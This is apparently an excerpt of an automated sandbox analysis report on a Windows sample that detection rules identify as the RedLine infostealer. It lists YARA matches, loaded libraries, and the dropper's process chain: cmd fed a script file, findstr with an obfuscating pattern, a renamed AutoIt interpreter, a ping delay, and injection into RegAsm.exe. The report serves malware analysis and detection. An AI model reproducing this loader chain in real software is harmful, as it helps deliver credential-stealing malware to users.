              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C06FE6 | 6_2_00C06FE6
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BF33B7 | 6_2_00BF33B7
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BFF409 | 6_2_00BFF409
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BED45D | 6_2_00BED45D
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BF16B4 | 6_2_00BF16B4
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BDF6A0 | 6_2_00BDF6A0
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BEF628 | 6_2_00BEF628
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BD1663 | 6_2_00BD1663
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BF78C3 | 6_2_00BF78C3
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BF1BA8 | 6_2_00BF1BA8
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BFDBA5 | 6_2_00BFDBA5
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C09CE5 | 6_2_00C09CE5
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BEDD28 | 6_2_00BEDD28
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BFBFD6 | 6_2_00BFBFD6
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BF1FC0 | 6_2_00BF1FC0
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Code function: 10_2_0250DDE8 | 10_2_0250DDE8
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Code function: 10_2_0250D4F0 | 10_2_0250D4F0
              Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Code function: String function: 004026FC appears 38 times
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: String function: 00BF0D17 appears 70 times
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: String function: 00BE1A36 appears 34 times
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: String function: 00BF8B30 appears 42 times
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003281000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeB vs 2YLM6BQ9S3.exe
              Source: 2YLM6BQ9S3.exe, 00000000.00000002.2334161602.000000000041B000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesettings Qt5< vs 2YLM6BQ9S3.exe
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2024866789.00000000025B1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesettings Qt5< vs 2YLM6BQ9S3.exe
              Source: 2YLM6BQ9S3.exe, 00000000.00000002.2334653222.000000000076E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs 2YLM6BQ9S3.exe
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeB vs 2YLM6BQ9S3.exe
              Source: 2YLM6BQ9S3.exe | Binary or memory string: OriginalFilenamesettings Qt5< vs 2YLM6BQ9S3.exe
              Source: 2YLM6BQ9S3.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
              Source: 8.3.Appartenga.exe.com.429f508.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
              Source: 8.3.Appartenga.exe.com.429f508.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
              Source: 10.2.RegAsm.exe.720000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000008.00000003.2416702324.0000000004270000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 00000008.00000003.2416510375.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 00000008.00000003.2416510375.00000000042D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 00000008.00000003.2416670855.000000000424C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 00000008.00000003.2416510375.0000000004286000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: 0000000A.00000002.3266529061.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: Process Memory Space: Appartenga.exe.com PID: 6688, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: Process Memory Space: RegAsm.exe PID: 1520, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@16/7@2/2
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Code function: 0_2_00408E3C wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree, | 0_2_00408E3C
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C28DE9 AdjustTokenPrivileges,CloseHandle,6_2_00C28DE9
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C29399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_00C29399
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_004011DA GetDiskFreeSpaceExW,SendMessageW,0_2_004011DA
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C34148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,6_2_00C34148
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_004038B1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004038B1
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_00401DE6 GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401DE6
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_03
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000Jump to behavior
              Source: 2YLM6BQ9S3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 2YLM6BQ9S3.exeReversingLabs: Detection: 57%
              Source: 2YLM6BQ9S3.exeVirustotal: Detection: 54%
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeFile read: C:\Users\user\Desktop\2YLM6BQ9S3.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\2YLM6BQ9S3.exe "C:\Users\user\Desktop\2YLM6BQ9S3.exe"
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Ideale.adt
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com Appartenga.exe.com S
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com S
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\PING.EXE | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe | Section loaded: fwpuclnt.dll
Source: 2YLM6BQ9S3.exe | Static file information: File size 1721467 > 1048576
Source: Binary string: nHC:\Windows\System.ServiceModel.pdbpdbdel.pdb source: RegAsm.exe, 0000000A.00000002.3266505833.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.ServiceModel.pdbr62 source: RegAsm.exe, 0000000A.00000002.3266824842.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbS source: RegAsm.exe, 0000000A.00000002.3266824842.0000000000A04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000000A.00000000.2371566771.0000000000342000.00000002.00000001.01000000.00000006.sdmp, RegAsm.exe.8.dr
Source: Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3266505833.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: ystem.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3270045038.0000000005B2E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000A.00000000.2371566771.0000000000342000.00000002.00000001.01000000.00000006.sdmp, RegAsm.exe.8.dr
Source: Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3266824842.000000000095F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3266824842.000000000095F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: RegAsm.exe, 0000000A.00000002.3270045038.0000000005B2E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbB source: RegAsm.exe, 0000000A.00000002.3266824842.0000000000A04000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Code function: 0_2_0040238C LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040238C
Source: 2YLM6BQ9S3.exe | Static PE information: real checksum: 0xe72d1 should be: 0x1a610e
Source: C:\Users\user\Desktop\2YLM6BQ9S3.exe | Code function: 0_2_00412BE0 push eax; ret 0_2_00412C0E
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BF8B75 push ecx; ret 6_2_00BF8B88

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00C559B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,6_2_00C559B3
Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com | Code function: 6_2_00BE5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_00BE5EDA
